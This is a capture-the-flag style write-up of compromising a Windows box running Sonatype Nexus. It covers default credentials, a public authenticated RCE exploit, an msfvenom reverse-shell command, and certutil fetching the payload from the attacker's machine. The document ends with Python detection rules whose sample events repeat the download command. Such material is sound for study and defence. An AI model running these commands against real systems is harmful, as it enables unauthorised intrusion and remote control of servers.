# Billyboss (WIP)

## Nmap

```
sudo nmap 192.168.64.61 -p- -sS -sV

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Microsoft ftpd
80/tcp   open  http    Microsoft IIS httpd 10.0
8081/tcp open  http    Jetty 9.4.18.v20190429
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

On port 8081 we have Sonatype Nexus Repository Manager running, version 3.21.0.05.

![http://192.168.64.61:8081/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2ab0b056febd543026c024a74a45e5079a001c64%2Fimage.png?alt=media)

Guessing the sign-in credentials nexus:nexus gives access to Nexus. Searching for exploits against this version shows an authenticated RCE on exploit-db.com:

{% embed url="https://www.exploit-db.com/exploits/49385" %}

First I created a reverse shell with msfvenom that connects back to my machine on port 21: `msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.64 LPORT=21 -f exe > /home/kali/windows/shell.exe`

Then I started a Python SimpleHTTPServer on my attacking machine to host the shell. After that I edited the exploit code to include the credentials we have and to execute cmd.exe, which in turn runs certutil.exe to download the reverse shell from my attacking machine.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0ecdbcc6b97e2898c2aa9776b689c4f38729051c%2Fimage.png?alt=media)

After doing this, and confirming from my attacking machine's web server log that the shell had been downloaded, I edited the exploit code to call cmd.exe again and execute the shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f23c39609dc9bedab788b9873e426812c5cdba20%2Fimage.png?alt=media)

After which we receive a shell back on our `netcat` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6651fdff3307118cb34bd97bf78a3e23f6d38f4f%2Fimage.png?alt=media)
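From the defender's side, the chain above leaves two obvious process-creation artifacts: certutil.exe fetching a file over HTTP, and the Nexus service's java.exe spawning cmd.exe. As an added example (not from the original write-up), the Python below scans constructed Sysmon-style Event ID 1 lines for both patterns; the field names are Sysmon's, while the event lines, file paths and the `C:\nexus` install directory are assumptions.

```python
import re
from typing import Iterable

# Constructed Sysmon-style process-creation events (Event ID 1 fields), key=value per line.
# Hypothetical sample data written for this example; not log data from the box.
SAMPLE_EVENTS = [
    r'Image=C:\Windows\System32\cmd.exe ParentImage=C:\nexus\jre\bin\java.exe '
    r'CommandLine="cmd.exe /c certutil.exe -urlcache -split -f http://192.168.49.64/shell.exe shell.exe"',
    r'Image=C:\Windows\System32\cmd.exe ParentImage=C:\nexus\jre\bin\java.exe '
    r'CommandLine="cmd.exe /c shell.exe"',
    r'Image=C:\Windows\System32\certutil.exe ParentImage=C:\Windows\System32\cmd.exe '
    r'CommandLine="certutil.exe -hashfile C:\Users\admin\setup.msi SHA256"',
    r'Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe '
    r'CommandLine="notepad.exe"',
]

FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')
REMOTE_URL = re.compile(r'https?://', re.IGNORECASE)

def parse_event(line: str) -> dict:
    """Split one key=value event line into a dict; quoted values may contain spaces."""
    return {m.group(1): (m.group(3) if m.group(3) is not None else m.group(4))
            for m in FIELD_RE.finditer(line)}

def classify(event: dict) -> list:
    """Return the names of the detection rules that match one process-creation event."""
    hits = []
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "").lower()
    # certutil used as a downloader: -urlcache together with a remote URL on the command line
    if "certutil" in cmd and "-urlcache" in cmd and REMOTE_URL.search(cmd):
        hits.append("certutil_download")
    # the Nexus service runs under java.exe and has no business spawning a command shell
    if parent.endswith("\\java.exe") and image.endswith("\\cmd.exe"):
        hits.append("java_spawns_cmd")
    return hits

def scan(lines: Iterable[str]) -> list:
    """Return (command line, detections) for every event that triggers at least one rule."""
    results = []
    for line in lines:
        ev = parse_event(line)
        hits = classify(ev)
        if hits:
            results.append((ev.get("CommandLine", ""), hits))
    return results

if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits)}: {cmdline}")
```

The benign `certutil -hashfile` event is deliberately included to show that the download rule keys on `-urlcache` plus a URL, not on certutil alone.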
